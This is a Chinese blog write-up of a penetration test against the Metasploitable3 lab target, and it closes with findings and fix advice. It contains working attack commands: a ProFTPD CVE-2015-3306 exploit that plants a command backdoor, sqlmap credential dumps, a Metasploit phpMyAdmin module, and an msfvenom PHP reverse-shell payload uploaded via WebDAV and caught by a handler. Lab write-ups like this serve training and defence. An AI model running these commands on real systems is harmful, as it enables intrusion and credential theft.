Metasploitable3渗透测试实战

这是一个著名的靶场Metasploitable3,关于靶机搭建网上文章非常多,这里我就不再写了,但是关于漏洞挖掘没有什么文章,而且这个靶场windows版本和linux版本还有差别,我这里写一些简单的吧,自己就挖到这个程度了,有不对的地方还请前辈高人指点一二

1综述

经过演习指挥部授权,团队于2020年1月14日,对XXXXXX单位进行了渗透评估,通过模拟真实网络攻击行为,评估系统是否存在可以被攻击者利用的漏洞以及由此因此引发的风险大小,为制定相应的安全措施与解决方案提供实际的依据。
渗透结果总结汇总如下表:
在这里插入图片描述

2.渗透过程

2.1渗透路径说明

2.1.1全端口扫描/服务发现

在这里插入图片描述

2.1.2目录扫描

在这里插入图片描述

2.1.3一、ProFTPD 1.3.5命令读取和写入任意文件。

根据版本可以知道目标网站存在CVE-2015-3306 漏洞
exp下载地址:https://github.com/t0kx/exploit-CVE-2015-3306
1.使用git clone https://github.com/t0kx/exploit-CVE-2015-3306将exp下载到本地
在这里插入图片描述

2.执行python3 exploit.py --host 192.168.44.138 --port 21 --path "/var/www/html"运行检测脚本
在这里插入图片描述

访问http://192.168.44.138/backdoor.php?cmd=id

可以看到成功执行了命令
在这里插入图片描述

2.1.4二、sql注入

在http://192.168.44.138/payroll_app.php登录时抓包发送到burp爆破模块
在这里插入图片描述

将用户名设为暴破变量
在这里插入图片描述

可以发现目标网站对payload进行了执行处理,可以推断该处存在sql注入漏洞
在这里插入图片描述

将数据包存在post.txt文件中,使用sqlmap进行测试
sqlmap -r post.txt -p “user” -dbs 可以得到数据库名称
在这里插入图片描述

3.依次可以得到表和字段名称,最后使用命令
sqlmap -r post.txt -p “user” -D payroll -T users -C first_name,last_name,password --dump
得到数据库中存储的用户名密码
在这里插入图片描述

2.1.5三、phpmyadmin远程php代码执行

1.用数据库中得到的用户名密码 leia_organa help_me_obiwan 登录ssh
ssh leia_organa@192.168.4.138
在这里插入图片描述

2.sudo -s 提升到管理员权限
在这里插入图片描述

寻找 payroll相关的源代码文件 find / -name “payroll
在这里插入图片描述

4.查看/var/www/html/payroll_app.php文件,可以看到数据库账户密码
在这里插入图片描述

5.使用账户密码可以进入phpMyAdmin后台,查看版本
在这里插入图片描述

6.在MSF中依次执行
search phpmyadmin 3.5.8
use multi/http/phpmyadmin_preg_replace
set password sploitme
在这里插入图片描述

成功连接到目标服务器

2.1.6四、文件上传漏洞

1.针对目录扫描出来的路http://192.168.44.138:80/uploads/
利用msf中的工具进行上传生成payload (默认路径是在home下)
msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.44.149 LPORT=6666 -f raw >demon.php
在这里插入图片描述

2.上传payload
davtest -url http://192.168.44.138:80/uploads/ -uploadfile demon.php -uploadloc DavTestDir_F7umGStRba9ZCw/6666.php
在这里插入图片描述

3.使用侦听模块
use exploit/multi/handler
set payload php/meterpreter_reverse_tcp
set LHOST 192.168.44.149
set LPORT 6666
在这里插入图片描述

成功连接目标服务器

2.2渗透成果说明

2.2.1

在这里插入图片描述

2.3存在问题

1.ProFTPD中使用的mod_copy模块存在未授权访问风险,导致ProFTPD自带的命令 SITE CPFR 和 SITE CPTO 可在未登录ftp的情况被外部黑客所利用,对系统文件进行任意复制。
2.在与数据库交互的地方并未作出安全的过滤,导致参数被数据库当成命令执行,威胁到服务器数据安全。
3.采用的phpmyadmin组件有版本漏洞,容易被攻击者进行利用。
4.对文件上传目录并没有进行权限管理,未登录就可以访问该目录,并未对可以上传的内容与用户做出限定,并且该目录有可执行权限。

2.4整改建议

1.针对于ProFTPD与phpmyadmin中出现的问题建议将该组件更新为最高版本或到官方网站及时更新补丁。
2.针对sql注入,建议完善输入检查,采用白名单的方式对输入进行过滤,并将输入内容进行转义,参数化处理。
3.针对文件上传问题,对url采用防回溯处理,采用open_basedir限制用户访问范围,对文件上传路径进行访问限制,将上传的文件进行改名,并只给予该文件夹可读取权限。

  • 2
    点赞
  • 26
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值